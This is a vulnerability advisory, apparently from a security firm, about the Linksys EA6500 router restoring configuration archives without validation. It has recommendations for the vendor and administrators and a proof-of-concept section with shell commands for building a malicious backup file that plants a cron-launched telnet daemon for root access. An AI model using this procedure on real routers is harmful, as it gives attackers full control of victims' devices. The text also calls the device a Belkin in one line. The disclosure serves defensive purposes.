Compromising the Linksys EA6500
The Linksys EA6500 does not properly validate backed-up configuration files that are restored through the web management interface. If a device administrator can be fooled into restoring a malicious configuration file, an attacker can create or overwrite arbitrary files on the EA6500's file system, and obtain remote, root shell access.
- The victim must be fooled in to logging in to the EA6500's web interface and restoring a malicious configuration file.
Backup configuration files for the Linksys EA6500 contain a tar.gz archive file, and upon restoration, the device extracts the archive to the root of the file system. By including a telnet daemon, and a cron script that starts the daemon, an attacker can gain root shell access to the router.
Vulnerable Firmware is 126.96.36.199876
Other versions of the firmware were not tested.
A successful attack exploiting this vulnerability can give a remote adversary full control over the victim router.
Recommendations to the vendor
- Configuration files should be validated before they are restored to the router.
- Configuration files should contain only data that is carefully parsed by the router, and not arbitrary files that are extracted to the file system.
Recommendations to device administrators
- (4/13/2013) There is not currently an available firmware upgrade that will remedy this vulnerability.
- Never restore a configuration file from an untrusted source.
- Take additional preventative measures and precautions by following the steps outlined on our summary page here.
Proof of Concept
- Create the necessary directory structure:
mkdir -p tmp/cron/cron.everyminute
- Write the script shown in Figure 1 to the file
tmp/cron/cron.everyminute/utelnetd.sh, and set 755
- Download the utelnetd source code from the Internet,
cross-compile a statically linked version for the mipsel
architecture, and write it to
tmp/utelnetd, with 755
- Archive the files to a tar.gz file:
tar -czpvf backup.tar.gz --owner=root --group=root \ tmp
- Add the header necessary for the router to process as a
echo -e '0x0002\n'`stat -c %s backup.tar.gz` | \ cat - backup.tar.gz > backup.cfg
- Provide the resulting backup.cfg file to the victim.
- Utelnetd on Sourceforge
- CVE-2013-3064: Unvalidated URL Redirect
- CVE-2013-3065: DOM Cross-Site Scripting
- CVE-2013-3066: Information Disclosure
- Discovered By: Jacob Thompson – Security Analyst @ Independent Security Evaluators
- Exploited By: Jacob Thompson – Security Analyst @ Independent Security Evaluators
- For more information on this particular Belkin hack, you can contact us at firstname.lastname@example.org
- Alternatively, for more general information on ISE, you can reach us using email@example.com